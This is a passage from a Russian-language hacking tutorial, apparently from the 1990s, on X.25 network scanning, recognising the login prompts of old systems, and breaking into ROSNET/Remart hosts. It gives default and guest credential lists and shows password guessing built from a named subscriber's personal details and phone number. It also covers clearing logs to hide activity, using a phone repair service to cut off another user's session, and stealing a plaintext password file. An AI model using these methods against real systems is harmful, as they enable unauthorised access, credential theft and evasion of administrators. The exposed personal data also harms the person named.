Это называется Задержкой PAD, и предназначено для ожидания, пока вы пошлете данные через несколько различных линков.&lt;br /&gt;Что вы делаете с этим PAD? Вы используйте его, чтобы соединиться с отдаленными компьютерными системами, печатая "С" для соединения и затем Сетевой Адрес Пользователя (NUA) системы, к которой вы хотите идти.&lt;br /&gt;Если нет возможности соединения, вы получите сообщения типа:&lt;br /&gt;refused collect connections&lt;br /&gt;в сопровождении кодов ошибки, идущих справа, и система вернет вас в @ prompt.&lt;br /&gt;Имеются два пути, чтобы двигаться в обход сообщения - Refused Collect. Первый - использование сетевого ID пользователя (NUI). NUI - это имя пользователя/pw комбинация, которая подобно кредиту по открытому счету на Telnet.&lt;br /&gt;Второй способ соединение состоит в том, чтобы использовать частный PAD или через что-нибудь подобное Netlink от Главного компьютера. Префикс в Telnet NUA часто (но не всегда) относится к телефонному коду города, где находится компьютер (то есть, 713ххх обозначало бы компьютер в Хьюстоне, штат Техас). Если специфическая область, интересующая вас, например Нью-Йорк (код 914), вы можете набрать:&lt;br /&gt;@C 914 001&lt;br /&gt;Если соединение прошло, вы получите сообщение об этом и перейдете к 914 002. Делайте это, пока не найдете интересных систем для занятия ими.&lt;br /&gt;Не все системы находятся на простом ххх ууу адресе. Некоторые составлены из четырех или пяти цифр (914 2354), а некоторые имеют десятичные или числовые расширения (422 121А = 422 121.01). Вы можете заниматься ими, но вы никогда не знаете, что можете найти.&lt;br /&gt;Полное сканирование префикса займет десять миллионов вариантов. Например, если нужно просмотреть 512, то необходимо начать с 512 00000.00 и пройти до 512 00000.99, а затем увеличить адрес на 1 и пройти от 512 00001.00 до 5120001.99.&lt;br /&gt;Имеется множество компьютеров для просмотра с тремя номерами, так что не стоит заниматься безумством с большими расширениями.&lt;br /&gt;Иногда при попытке соединения будет проходить одна или две минуты ожидания. В этом случае, вы можете прервать связь посредством жесткого разрыва, затем, после того, как вновь система выдаст&lt;br /&gt;@ prompt&lt;br /&gt;Наберите "D" для отсоединения.&lt;br /&gt;Outdials.&lt;br /&gt;Кроме компьютеров, NUA может подключить вас к некоторым другим вещам.&lt;br /&gt;Одна из наиболее полезных - outdial. Outdial, это не более чем модем, которым можно заняться по telnet - подобно концепции преследования PC, за исключением того, что тут не используются пароли.&lt;br /&gt;После соединения, вы получите сообщение, подобное&lt;br /&gt;Hayes 1200 bode outdial, Detroit, MT&lt;br /&gt;или&lt;br /&gt;VEN-TEL 212 Modem&lt;br /&gt;или, возможно&lt;br /&gt;Session 1234 established on Modem 5588&lt;br /&gt;Лучший способ выяснить команды состоит в том, чтобы напечатать "H" или "Help" - это даст вам всю информацию, которая вам необходима.&lt;br /&gt;Подсказка по безопасности: когда будете взламывать какую-нибудь систему через телефонный дозвон, всегда используйте outdial или diverter, особенно, если это местный номер. Многие люди занимаются хакингом на местных компьютерах.&lt;br /&gt;Другая хорошая уловка, которую вы можете применить с outdial - использования повторного набора или функцией макрокоманды, которую многие из них имеют. Первая вещь, которую надо сделать после соединения, вызвать "Повторный набор последнего номера" (Redial last number). Это будет номер того человека, который использовал канал до вас. Запишите его, поскольку никто не вызвал бы номер без наличия компьютера на нем. Это - хороший способ найти новые системы для хакинга. Для VENTEL-модема наберите "D", и вам будет показано пять номеров, сохраненных как макрокоманды в памяти модема.&lt;br /&gt;И наконец, вы можете соединяться с тем, что называется "X.25 Communication PAD", получив несколько больше материала, сопровождаемого подсказкой @. Это PAD точно такой же как тот, с которым работаете вы, за исключением того, что все предпринятые подключения объявляются PAD, позволяя вам соединяться теми узлами, которые ранее отказались от подключения.&lt;br /&gt;Когда пакет передан от Pad к Pad, он содержит заголовок, в котором размещена информация о вашем местоположении. Например, когда вы вначале соединяетесь с Telnet, вам может быть сообщено&lt;br /&gt;212 44A Connected&lt;br /&gt;если вы звоните с кода города 212. Это означает, что вы вызвали номер 44A PAD в 212 области.&lt;br /&gt;21244A будет поставлено на заголовке всех отправляемых пакетов.&lt;br /&gt;Как только вы соединяетесь с частным PAD, все пакеты, выходящие от вас будут иметь этот адрес на них, но не ваш. Это может быть достаточным буфером между вами.&lt;br /&gt;&lt;br /&gt;наверх&lt;br /&gt;Идентификация ОС.&lt;br /&gt;&lt;br /&gt;Не имеет значения, как вы нашли компьютер, это могло произойти через сеть, или могло при помощи сканирования телефонного префикса вашей университетской сети. Здесь не будет объясняться, что можно сделать, как только вы окажитесь внутри какой-либо операционной системы. Здесь будет рассказано как идентифицировать и распознать некоторые операционные системы и как приблизиться к хакингу в них, как иметь дело с тем, чего вы никогда не видели прежде.&lt;br /&gt;VMS.&lt;br /&gt;VAX компьютер создан Digital Equipment Corporation (DEC), и выполняет VMS (виртуальная система памяти) операционную систему.&lt;br /&gt;VMS определяется по подсказке:&lt;br /&gt;USENAME&lt;br /&gt;Она не будет сообщать вам, если вы ввели неправильное имя пользователя, и отсоединит вас после трех неудачных попыток входа в систему. Также она следит за всеми неудачными попытками входа в систему и сообщает владельцу учетную запись при его следующем выходе в сеть.&lt;br /&gt;Это - одна из наиболее безопасных операционных систем, что касаемо защиты от внешнего проникновения, но и здесь имеется много уловок для обхода защиты. VAX также имеет лучший набор справочных файлов. Только наберите "HELP" и читайте.&lt;br /&gt;DEC-10.&lt;br /&gt;DEC-10 более ранние модели оборудования компьютера DEC, запускающие TOPS-10 операционную систему. Эти машины могут быть опознаны по подсказке ".".&lt;br /&gt;Серия DEC-10/20 весьма дружественна к хакерам, позволяя ввести несколько важных команд без какой-либо регистрации в системе. Отчетность находится в формате [xxx, yyy], где xxx и yyy - целые числа. Вы можете получить листинг отчетности и имен процесса каждого на системе перед регистрацией при помощи команды .systat (для системного состояния). Если учетная запись читается как [234, 1001] BOB JOINS, то можно попробовать набрать BOB или JOINS или эти два слова вместе для пароля на этой учетной записи. Чтобы войти вы печатаете:&lt;br /&gt;.login xxx, yyy&lt;br /&gt;и затем, после запроса набираете пароль.&lt;br /&gt;Система позволит вам неограниченные попытки проникновения и не сохранит отчеты о неудачных попыток входа в систему. Также она сообщит вам, если UIC, который вы пробуете (UIC - код идентификации пользователя) не правилен.&lt;br /&gt;UNIX.&lt;br /&gt;Имеется множество различных машин на которых установлен UNIX.&lt;br /&gt;В то время как некоторые могли бы доказать, что это не лучшая операционная система в мире, она наиболее широко используема. Система UNIX будет обычно выдавать подсказку наподобие&lt;br /&gt;login:&lt;br /&gt;в строчных буквах. UNIX также даст вам неограниченные попытки при регистрации (в большинстве случаев), и не имеется обычно никакого журнала, сохраняющего неудачные попытки.&lt;br /&gt;Prime.&lt;br /&gt;Компьютеры фирмы Prime, как правило, используют операционную систему Primos. Ее очень просто определить по надписи:&lt;br /&gt;Primecon 18.23.05&lt;br /&gt;или чего-то подобного, в зависимости от версии операционной системы. Обычно система не будет предлагать никакой подсказки. Там, где появилась эта надпись, наберите&lt;br /&gt;login&lt;br /&gt;Если это версия до 18.00.00 Primos, вы можете нажимать связку ^C для пароля. К сожалению, большинство людей использует версии 19+. Primos также располагает хорошим набором справочных файлов. Одна из наиболее полезных особенностей Prime на Telnet - устройство NETLINK. Как только вы - внутри, напечатайте "NETLINK", и следуйте указанием справки. Это позволит соединяться с NUA'S во всем мире используя команду "nc".&lt;br /&gt;Например, чтобы соединиться с NUA 026245890040004, вы должны набрать&lt;br /&gt;@nc: 026245890040004&lt;br /&gt;в подсказке netlink.&lt;br /&gt;HP-x000.&lt;br /&gt;Эта система сделана Hewlett-Packard. Их характерная подсказка ":".&lt;br /&gt;HEWETT-PACKARD имеет одну из более сложных последовательностей входа в систему извне - вы набираете:&lt;br /&gt;HELLO SESSION&lt;br /&gt;NAME, USERNAME, ACCOUNTNAME, GROUP&lt;br /&gt;Некоторые из этих полей могут быть оставлены пустыми во многих случаях. Так как любые или все эти поля могут быть запаролены, это не самая простая система для проникновения, если бы не факт, что имеется обычно некоторая отчетность вокруг без паролей. Вообще, если значения по умолчанию не работают, вы будете должны применить грубую силу, используя обычный список пользователей. Hp-x000 выполняет MPE операционную систему, подсказка для нее будет ":", точно так же как подсказка входа в систему.&lt;br /&gt;IRIS.&lt;br /&gt;IRIS создан для Interactive Real Time Information System (интерактивная информационная система в режиме реального времени). Первоначально она выполнялась на PDP-11'S, но теперь выполняется на многих других мини ЭВМ. Вы можете определить Айрис по заголовку&lt;br /&gt;Welcome to "IRIS" R9.1.4 Timesharing&lt;br /&gt;и подсказке&lt;br /&gt;ACCOUNT ID?&lt;br /&gt;Iris позволяет неограниченные попытки при хакинге, и не сохраняет никаких журналов неудачных попыток.&lt;br /&gt;VM/CMS.&lt;br /&gt;VM/CMS - операционная система, выполняемая в IBM. Когда вы соединяетесь с одной из них, вы получите сообщение, наподобие&lt;br /&gt;VM/370 ONLINE&lt;br /&gt;затем подсказку ".". Чтобы войти, наберите:&lt;br /&gt;LOGIN&lt;br /&gt;NOS.&lt;br /&gt;NOS созданы для Networking operation system, и выполняются на компьютере Cyber, созданном Control Data Corporation. NOS идентифицируют себя с готовностью, с заголовком&lt;br /&gt;Welcome to the NOS Software System. Copyright Control Data 1978, 1987&lt;br /&gt;Первая подсказка, которую вы получите, будет&lt;br /&gt;Family:&lt;br /&gt;В ответ нужно нажать return, тогда вы получите подсказку&lt;br /&gt;user name:&lt;br /&gt;Имена пользователя - типичные 7 символов буквенно-цифрового характера. Отчетность оператора начинается с цифры, типа 7ETPDOC.&lt;br /&gt;Decserver.&lt;br /&gt;Это не совсем компьютерная система, это скорей сетевой сервер, который имеет много различных машин, доступных с его помощью. Decserver может сказать:&lt;br /&gt;Enter Username&gt;&lt;br /&gt;после первого соединения. Это только идентификатор. Напечатайте "c", поскольку это - наименее заметная вещь для ввода. Тогда вы можете получить подсказку&lt;br /&gt;Local&gt;&lt;br /&gt;Наберите здесь:&lt;br /&gt;c&lt;br /&gt;чтобы соединиться с системой. Для получения списка системных имен, напечатайте&lt;br /&gt;sh servises&lt;br /&gt;или&lt;br /&gt;sh nodes&lt;br /&gt;Если у вас есть какие-то проблемы, встроенная подсказка доступна по команде "help". Ищите услуги по имени "modem" или "dial" или что-то подобное, они часто могут быть полезны.&lt;br /&gt;GS/1.&lt;br /&gt;GS/1 - другой тип сетевого сервера. В отличии от Decserver, вы не можете предсказать то, какую подсказку GS/1 шлюз собирается дать вам. Стандартная подсказка&lt;br /&gt;GS/1 &gt;&lt;br /&gt;но это предназначено для системных администраторов. Чтобы тестировать GS/1, набирайте&lt;br /&gt;sh d&lt;br /&gt;Если появиться большой список значений по умолчанию (скорость терминала, подсказка, четность и т.д.), можно смело сказать, что вы находитесь на GS/1. Вы соединяетесь тем же самым способом как и с Decserver, печатая:&lt;br /&gt;C&lt;br /&gt;чтобы выяснить, что системы являются доступными, наберите&lt;br /&gt;sh n&lt;br /&gt;или&lt;br /&gt;sh C&lt;br /&gt;Все вышеупомянутое - это главные типы систем, используемые сегодня. Имеются сотни вариантов этих систем, но написанного здесь должно хватить, чтобы дать вам возможность начать.&lt;br /&gt;&lt;br /&gt;наверх&lt;br /&gt;&lt;br /&gt;Список программ.&lt;br /&gt;&lt;br /&gt;Ниже приведен список программ для начинающего хакера. Эти программы не сделают из вас хакера и использование их необязательно для того, чтобы стать им. Эти инструменты (программы) помогут вам узнать много полезного и необходимого.&lt;br /&gt;ToneLoc v1.10.&lt;br /&gt;Эта программа является сканером. Задача этой программы просканировать местную телефонную линию на наличие модема на другом конце.&lt;br /&gt;Cracker Jack v1.4.&lt;br /&gt;Крекер паролей. Эта программа работает под DOS и задача ее состоит в нахождении и взломе пароля под UNIX.&lt;br /&gt;Hacker's Utility v1.02.&lt;br /&gt;Эта программа включает в себя множество полезных утилит. В нее входит:&lt;br /&gt; крекер паролей&lt;br /&gt; генератор паролей&lt;br /&gt; post scanner&lt;br /&gt; finger lookup&lt;br /&gt; file extractor и многое другое...&lt;br /&gt;CyberKit v2.4.&lt;br /&gt;В этой программе есть:&lt;br /&gt; TraceRoute&lt;br /&gt; Whols&lt;br /&gt; Finger&lt;br /&gt; Name Server Lookup&lt;br /&gt; Time Synchronizer&lt;br /&gt; Quote of the Day и многое другое...&lt;br /&gt;PGP Freeware v5.0.&lt;br /&gt;Эта программа предназначена для шифрования информации.&lt;br /&gt;7th Sphere PortScan v1.1.&lt;br /&gt;Полезный и очень быстрый сканер портов. Очень прост в установке и работе.&lt;br /&gt;А теперь два главных правила:&lt;br /&gt;1. Что бы стать хакером понадобится много времени. Чтобы научиться чему-нибудь есть только один путь - вы должны читать и еще раз читать. Со временем у вас будут появляться вопросы, тогда задайте их тому, кто знает, например на крэкерских и хакерских форумах.&lt;br /&gt;2. Изучайте программирование, язык скриптов, а предпочтительнее языки под UNIX (C++, Perl, JavaScript и другие). Так же следует изучать OS UNIX, протоколы TCP/IP.&lt;br /&gt;&lt;br /&gt;наверх&lt;br /&gt;&lt;br /&gt;Вместо примера (или как ломалась сеть РОСНЕТ).&lt;br /&gt;&lt;br /&gt;Несколько основных положений.&lt;br /&gt;1. Для начала вы должны осознать, что ничего серьезного лучше не хакать (либо делать это очень осторожно), так как вас могут очень быстро найти. У администратора системы высвечивается куча всякой информации. С помощью этой информации, он легко определяет город, из которого вы вошли в Роснет, а также номер узла и номер канала, по которому вы вошли, так же возможно определить и промежуточную сеть, из которой вы вышли в Роснет. А зная город, не составит большого труда найти и абонента, который в этот промежуток времени висел на номере входа в Роснет. Можно, конечно, войти сначала в одну сеть, из нее в другую, а потом в третью и т.д., а потом в Роснет, и это бесспорно замедлит поиск, но не исключит его.&lt;br /&gt;2. Заниматься своим "темным" делом вы должны с 20:00 (не ранее) до 00:00 часов местного времени. Так как в это время админы уже не работают, а следовательно не следят за системой. Но иногда админы работают круглосуточно. А выйти до 00:00 нужно потому, что Ремарт регистрирует дату последней связи, а в 00:00 вся информация обнуляется. Обнулить информацию можно и другим способом - повесив Ремарт. Так же следует помнить, что во многих системах производится закрытие хоста на ночь (обычно это период 00:00 - 03:00). Никогда не пытайтесь что-нибудь сломать днем или утром, все ваши попытки будут пресечены, а если админ сильно рассердится, то и демо-вход закроет.&lt;br /&gt;3. Перед тем, как что-нибудь хакать войдите на хост под гостевым паролем (если такой имеется) и сразу же введите "/u", чтобы убедиться, что в данный момент в системе нет админа, или лиц к нему приближенных. Как только убедились, что админа нет, вводите "/r", чтобы посмотреть, насколько давно админ был в системе. Если все OK - приступайте:&lt;br /&gt;4. Если вы зашли в систему, попытайтесь залезть в директорию админа системы&lt;br /&gt;GO ADMIN&lt;br /&gt;редко, но иногда получается, если спросят пароль - попытайтесь подобрать (хотя админы любят абсолютно "левые" крутые пароли). В директории админа есть куча файлов с наиполезнейшей информацией.&lt;br /&gt;5. Пробравшись под взломанным логином в меню регистрации, ни в коем случае не меняйте пароль абонента и не переводите его деньги на другой счет. Админ это обязательно заметит, и примет меры.&lt;br /&gt;6. После того, как вы лазили под чьим-то логином, обязательно перезайдите под гостевым входом n-е количество (везде по-разному) раз. Этим вы забьете информацию о входивших пользователях - "/r" будет показывать, что последние десять раз входил "гость".&lt;br /&gt;7. Если вы делали что-то, что другим знать необязательно, повводите какой-нибудь макрос (примерно раз тридцать). Этим вы исключите просмотр выполнявшихся вами команд по "/e?".&lt;br /&gt;Как найти выход в РОСНЕТ.&lt;br /&gt;Номер телефона Роснета вы можете узнать очень просто - из списка телефонов Роснета по СНГ. Но возможно, что указанные номера телефонов уже не являются выходом в Роснет, так как их могли по какой-нибудь причине сменить. В этом случае, вы можете заняться сканингом. То есть взять скрипт или соответствующую программу и перебрать номера в городе на предмет коннекта.&lt;br /&gt;Определение системы и обнаружение гостевого входа.&lt;br /&gt;Для большинства хаков вам нужно иметь хотя бы минимальный доступ на хосте. Поэтому мы решили начать именно с этого. Итак, допустим у вас есть горка адресов разных хостов, что же делать дальше? Нужно проверить работоспособность этих адресов, выяснить какая система там установлена, уровень его защищенности и имеет ли этот хост гостевой вход.&lt;br /&gt;И так, допустим вы зашли на какой-нибудь приглянувшийся вам хост.&lt;br /&gt;Систему можно определить конечно же по приглашению.&lt;br /&gt;Примеры приглашений свойственных той или иной системе:&lt;br /&gt;Ремарт.&lt;br /&gt;Display ANSI graphics ([Y]/N)? &gt;&lt;br /&gt;[...Какой-нибудь текст (его может и не быть)...]&lt;br /&gt;UserID:&lt;br /&gt;Password:&lt;br /&gt;Дионис.&lt;br /&gt;ENTER YOUR NAME =&gt;&lt;br /&gt;PASSWORD =&gt;&lt;br /&gt;LANGUAGE =&gt;&lt;br /&gt;REX400.&lt;br /&gt;Logical Channel: 0&lt;br /&gt;REX400 v4.54.02, Copyright (C) 1992-1996, Club400 Ltd.&lt;br /&gt;&gt;&gt;&lt;br /&gt;^^^^^^^&lt;br /&gt;M) Mail H) Help G) GateWay Q) Quit&lt;br /&gt;Multi Host&gt;&lt;br /&gt;CISCO-Маршрутизатор.&lt;br /&gt;User Access Verification&lt;br /&gt;Password:&lt;br /&gt;Если вы обнаружите Ремарт, начинайте проверять хост на наличие гостевого входа, пробуйте следующие комбинации:&lt;br /&gt;(UserID/Password):&lt;br /&gt;Demo/Demo Test/Test Guest/Guest Gast/Gast Gost/Gost User/User&lt;br /&gt;Demo/Guest Test/Guest Guest/Test Gast/Demo Gost/Demo User/Demo&lt;br /&gt;Demo/Test Test/Demo Guest/Demo Gast/Guest Gost/Guest User/Guest&lt;br /&gt;Demo/Gast Test/Gast Guest/Gast Gast/Test Gost/Test User/Test&lt;br /&gt;Demo/Gost Test/Gost Guest/Gost Gast/Gost Gost/Gast User/Gast&lt;br /&gt;Demo/User Test/User Guest/User Gast/User Gost/User User/Gost&lt;br /&gt;Demo/New Test/New Guest/New Gast/New Gost/New User/New&lt;br /&gt;Demo/Temp Test/Temp Guest/Temp Gast/Temp Gost/Temp User/Temp&lt;br /&gt;New/New Temp/Temp&lt;br /&gt;New/Demo New/Test New/Guest New/Gast New/Gost New/User&lt;br /&gt;Temp/Demo Temp/Test Temp/Guest Temp/Gast Temp/Gost Temp/User&lt;br /&gt;Перепробуйте так же все приведенные комбинации, добавляя цифры, например:&lt;br /&gt;Deno1/Demo1&lt;br /&gt;и т.д., потом попробуйте просто перечисленные логины без паролей. Для ускорения этого процесса используйте скрипт. В среднем за ночь один хост (при помощи скрипта) вы "проштудируете".&lt;br /&gt;Если гостевого входа нет.&lt;br /&gt;Если демо-вход не обнаружено, то попробуйте следующее:&lt;br /&gt;UUCP/UUCP&lt;br /&gt;этот пароль стоит в Ремарте по умолчанию и часто админы забывают его сменить.&lt;br /&gt;UUCP/PCUU&lt;br /&gt;Возможно пароль будет такой:&lt;br /&gt;UUCP/UUADMIN&lt;br /&gt;А может и такой.&lt;br /&gt;В общем пофантазируйте, может быть что-нибудь получиться. Если это не помогло, то попробуйте следующее:&lt;br /&gt;Alex/Alex Luda/Luda Boris/Boris Yura/Yura Olga/Olga Alexey/Alexey Dima/Dima Dmitry/Dmitry Nik/Nik Elena/Elena Lena/Lena и т.д.&lt;br /&gt;Если ничего не получилось, то хост неплохо защищен и чтобы хакнуть его вам придется потрудиться.&lt;br /&gt;Как узнать ID.&lt;br /&gt;Если вы вошли в систему, попытайтесь узнать список пользователей данного хоста.&lt;br /&gt;Узнать список можно, если попасть в меню "Регистрация". В этом меню можно ознакомиться с полным списком абонентов данного хоста. Если через меню вход закрыт, попробуйте так:&lt;br /&gt;go reg&lt;br /&gt;или&lt;br /&gt;go registry&lt;br /&gt;или&lt;br /&gt;go onboard1&lt;br /&gt;onboard - раздел регистрации.&lt;br /&gt;Для того, чтобы узнать имя раздела нужно попасть в раздел MAIN (GO MAIN или через меню системы пункт "Библиотека" и вызвать дерево директорий TREE, либо TYPE LIB или TYPE LIBS или TYPE LIBTREE.&lt;br /&gt;1 - номер меню "Список абонентов".&lt;br /&gt;Совсем недавно был замечен глюк, в частности на 6100255 список абонентов можно было узнать, просто скачав дерево директорий, там для каждого пользователя системы был создан одноименный каталог, к сожалению, этот глюк быстро закрыли.&lt;br /&gt;Если список взять не удалось, придется доставать ID другим способом. Залезьте в библиотеку и там, исходя из того, что к каждому файлу пишется имя абонента, можно получить несколько ID. Теперь если есть доступ к почте, таким же образом можно посмотреть ID авторов писем. Если этих ID вам мало, можно, орудуя /u и /r "выловить" еще 10-15 ID. Потом вызывайте паспорта найденных абонентов (/a ). "Сграбьте" их в один файл. Теперь вы располагаете достаточной информацией о пользователях - можно приступать к подбору пароля.&lt;br /&gt;Подбор пароля.&lt;br /&gt;Если вас не устраивают ваши полномочия, попробуйте подобрать пароль у какого-нибудь другого пользователя.&lt;br /&gt;Подбор бывает трех типов:&lt;br /&gt;1 - Подбор паролей по словарю (словарный метод);&lt;br /&gt;2 - Перебор (подбор пароля путем перебора);&lt;br /&gt;3 - Интеллектуальный подбор (подбор с использованием дополнительной информации и о пользователях.&lt;br /&gt;Для первых двух способов подбора вы можете использовать скрипт, или осуществлять все действия "руками", первое, как вы понимаете, предпочтительнее. Третий способ придется осуществлять "ручками".&lt;br /&gt;Ниже приводятся некоторые сведения, которые помогут вам при подборе пароля:&lt;br /&gt; Большим недостатком Ремарта является то, что большие и малые регистры не различаются.&lt;br /&gt; Логин и пароль могут совпадать.&lt;br /&gt; Пароль может быть из трех символов.&lt;br /&gt; Пароль не может превышать 8 символов.&lt;br /&gt; Неограниченное количество попыток при вводе пароля.&lt;br /&gt; Несомненно вам помогут списки пользователей хоста.&lt;br /&gt;Неограниченное количество попыток при вводе пароля.&lt;br /&gt;Итак, чтобы на перебор паролей затрачивалось меньше времени, то есть, чтобы вам предоставлялось неограниченное количество попыток при вводе пароля, нужно сделать следующее.&lt;br /&gt;Ваш друг заходит на хост (допустим под логином Demo и паролем Demo). После того, как он зашел на хост под Demo/Demo, вы тоже начинаете пытаться зайти на этот хост под тем же логином. Вам сообщают следующее (или что-то вроде этого):&lt;br /&gt;Абонент с таким логином уже работает в системе!&lt;br /&gt;Если Вы не знаете, кто бы это мог быть, и если это действительно Ваш логин, то срочно обратитесь к администоатору системы за разъяснениями.&lt;br /&gt;Вы можете позвонить по телефону 206-85-70 или 924-74-85.&lt;br /&gt;И снова просят ввести ID и Password. Повторяете вышеуказанное три раза (используете три попытки). И после этого можете пробовать любые логины с любыми паролями бесконечное число раз!&lt;br /&gt;К сожалению, как и многие другие "дыры", эту тоже кое-где прикрыли. Так что она проявляется не везде.&lt;br /&gt;Интеллектуальный подбор пароля.&lt;br /&gt;Итак, у вас есть несколько (или все) ID на интересующем вас хосте, так же у вас есть паспорта этих ID. Самое время приступить к интелектуалному подбору паролей.&lt;br /&gt;Возьмем произвольного абонента:&lt;br /&gt;Логин Фамилия/Имя Отчество/&lt;br /&gt;Телефон /Фирма /Город&lt;br /&gt;Ukrpack Лазарев/Андрей Михайлович/&lt;br /&gt;(0482) 33-31-78/СП "ТЕЛНЕТ"/г.Одесса&lt;br /&gt;Поехали:&lt;br /&gt;Ukrpack/Ukrpack&lt;br /&gt;Ukrpack/Kcaprku - наоборот&lt;br /&gt;Ukrpack/ Andrew - имя&lt;br /&gt;Ukrpack/Andy - имя&lt;br /&gt;Ukrpack/Andrey - имя&lt;br /&gt;Ukrpack/Fylhtq - имя (русскими буквами на английском регистре)&lt;br /&gt;Ukrpack/Kfpfhtd - фамилия (русскими буквами на английском регистре)&lt;br /&gt;Ukrpack/Vb[fqkjdbx - отчество (русскими буквами на английском регистре)&lt;br /&gt;Ukrpack/Lam - ФИО&lt;br /&gt;Ukrpack/Aml - ИОФ&lt;br /&gt;Ukrpack/Mal - ОИФ&lt;br /&gt;Ukrpack/Lma - ФОИ&lt;br /&gt;Ukrpack/333178 - телефон&lt;br /&gt;Ukrpack/Telnet - фирма&lt;br /&gt;Ukrpack/Ntkytn - фирма (русскими буквами на английском регистре)&lt;br /&gt;Ukrpack/Odessa - город (кстати, именно такой пароль и был)&lt;br /&gt;Ukrpack/Jltccf - город (русскими буквами на английском регистре)&lt;br /&gt;Так же проходимся по все остальным логинам, пять-шесть "лопухов" - это практически гарантия.&lt;br /&gt;Еще кое-что о подборе паролей.&lt;br /&gt;Самый лучший результат от подбора вы получите совместив все три способа. Сначала перебором перебираете варианты паролей от трех до пяти (включительно) символов. Пароли более большей длины вам врят ли удастся перебрать, так как количиство комбинаций расчитываеться по следующей формуле:&lt;br /&gt;X=S№&lt;br /&gt;где X - количество комбинаций, S - число символов используемых для перебора, и № - число символов в пароле. Поэтому после того, как вы перебрали все пароли в диапазоне от трех до пяти символов, вы точно знаете, что пароль состоит из шести и более символов (в противном случае вы его подобрали).&lt;br /&gt;Приступайте к подбору по паспорту абонента, если все еще не удалось подобрать пароль, начинайте перебор по словарю с "плохими паролями" (типа "qwerty" и "secret") удалите из него трех, четырех и пятисимвольные пароли (так как вы их уже перебрали) и приступаете к перебору и помните - главное терпение.&lt;br /&gt;Как узнать пароль абонента посредством "/U".&lt;br /&gt;Также пароль можно можно узнать следующим способом:&lt;br /&gt; Зайдите на хост.&lt;br /&gt; Залогиньтесь под любым логином.&lt;br /&gt; Включите в своей "терминалке" функцию Capture. И вводите:&lt;br /&gt;/u&lt;br /&gt;/u&lt;br /&gt;...&lt;br /&gt;/u&lt;br /&gt;Если вам повезет, то какой-нибудь юзер-остолоп в спешке введет вместо ID свой пароль, и он у вас благополучно зафиксируется в Сар'е.&lt;br /&gt;Лучше всего вышеуказанную операцию производить при помощи скрипта.&lt;br /&gt;Как узнать пароль абонента посредством "/Е ?".&lt;br /&gt;Интересной возможностью Ремарта, является команда /е?. Эта команда выводит список предыдущих команд. Посмотрев их, часто можно узнать много интересного.&lt;br /&gt;Кардинально новый способ взлома логика.&lt;br /&gt;Имеется одна интересная особенность узла РОСНЕТ: если войти в какой-нибудь хост и наглым образом обломать связь, т.е. вырубить модем или перегрызть провода, а потом сразу после этого позвонить на узел, то оказывается, что ты опять в том-же хосте. Вот это и является основным ключом метода!&lt;br /&gt;Самое главное - это дождаться пока какой-нибудь несчастный позвонит на роснетовский модем. Иногда это ожидание оказывается самым тяжким. Если-же вы все же дождались этого момента, то прежде всего надо убедиться, что это не кто-то из друзей лезет куда-то под гостем. Теперь необходимо позвонить в "Бюро ремонта ГТС" и попросить срочно проверить номер N (т.е. номер РОСНЕТ'а) и тут-же пытаться дозвониться на него. На ГТС увидят, что номер N занят и просто обломают ему коннект в качестве профилактического действия. Если вам повезло, то у того юзера, которого вы обломали, есть опция "Регистрация", а там вы можете посмотреть пароль нажатием кнопки "Z" (это для Ремарт систем).&lt;br /&gt;У этого метода есть один большой недостаток: все это нужно делать в будничный день, в часы работы "Бюро ремонта ГТС", т.е. днем, когда любой нормальный хакер спит...&lt;br /&gt;Как получить USRACC.DAT.&lt;br /&gt;Интересной особенностью Ремарта является то, что имена и пароли юзеров хранятся в файле datusracc.dat в незашифрованном виде, а это значит, что, если "уволочь" этот файл, из него можно почерпнуть множество интересного.&lt;br /&gt;Но существенной преградой является то, что обычно (если, конечно, админы не лопухи) каталог, где хранится Ремарт, не попадает в доступные разделы библиотеки. Чтобы его достать, необходимо иметь приоритет не ниже 30000 (вернее, приоритет определяется конфигурацией данного Ремарта и может быть изменен).&lt;br /&gt;Чтобы "уволочь" usracc.dat можно использовать один из следующих способов.&lt;br /&gt;Способ 1.&lt;br /&gt;Если вы знаете полный путь к файлу usracc.dat, то забрать этот файл не составит труда (местонахождения usracc.dat часто можно выудить из файла структуры библиотеки в виде дерева).&lt;br /&gt;Напишите письмо к самому себе, с аттачем в виде полного пути к useracc.dat на хосте. При совпадении определенных событий может прийти (должны быть заняты каналы!) не все, но загруженность должна быть велика. Данная "фича" на 6100255 не работает.&lt;br /&gt;Способ 2.&lt;br /&gt;Предположим, вы уже в Ремарте, и у вас есть надлежащий приоритет для создания раздела. Как это проверить? Войдите в библиотеку и проверьте список доступных команд, введя "?;" если в конце списка будет команда ml, вас можно поздравить.&lt;br /&gt;Далее действия следующие:&lt;br /&gt;1. Создайте раздел, указывающий на корень диска с: и с именем, к примеру, С:&lt;br /&gt;ml /d с с:&lt;br /&gt;Параметр /d указывает на то, что должен создаваться dos-раздел.&lt;br /&gt;Перейдите в раздел с командой с: и получите:&lt;br /&gt;С &gt;&lt;br /&gt;Затем командами cd и dir тщательно исследуйте подопытный раздел на предмет наличия там программных файлов Ремарта (они обычно размещаются в каталоге emart или emart.40, но могут быть и варианты)&lt;br /&gt;Если РЕМАРТ не удалось найти в данном разделе, грохните его (раздел) командой&lt;br /&gt;rl с&lt;br /&gt;создайте новый раздел, указывающий на корень d:, и проделайте вышеописанную операцию с ним. Так продолжайте до умопомрачения, или пока вас не выгонит админ.&lt;br /&gt;Дальше диска i: продолжать бессмысленно, поскольку РЕМАРТ в начальной своей конфигурации позволяет даунлоадать файлы только с дисков с, d. e, f, g, h, 1, но можно и попробовать...&lt;br /&gt;2. Если вы нашли каталог Ремарта, полюбуйтесь на файл usracc.dat в подкаталoгe dat. He пытайтесь даунлоадать его немедленно или смотреть по type - в лучшем случае система выдаст что-то вроде "Файл занят другим пользователем", а в худшем - зависнет, и все ваши безобразия будут видны как на ладони.&lt;br /&gt;3. Даунлоадните из главной директории Ремарта файл remart.bat и тщательно изучите его. Обратите внимание на ту часть, которая содержит информацию о "ночной перегенерации". Желательно скинуть и те файлы, которые пакетник грузит.&lt;br /&gt;Просмотрите его на предмет команд типа pause и других - необходимо, чтобы Ремарт нормально перезагрузился, иначе, встретив команду типа pause, он будет ждать напряга клавиши на главной консоли, а Вы останетесь ни с чем.&lt;br /&gt;Обычно remart.bat в процессе ночной чистки вызывает cleanup.bat, в котором содержатся команды вызова внешних модулей. В инсталляционном виде remart.bat вызывает чистку и перезапускается. Вот cleanup.bat нам-то и нужен!&lt;br /&gt;Не пытайтесь исправлять remart.bat - dos в таком случае выдает ругательство batch file missing, и главная консоль зависает.&lt;br /&gt;4. Просмотрите cleanup.bat 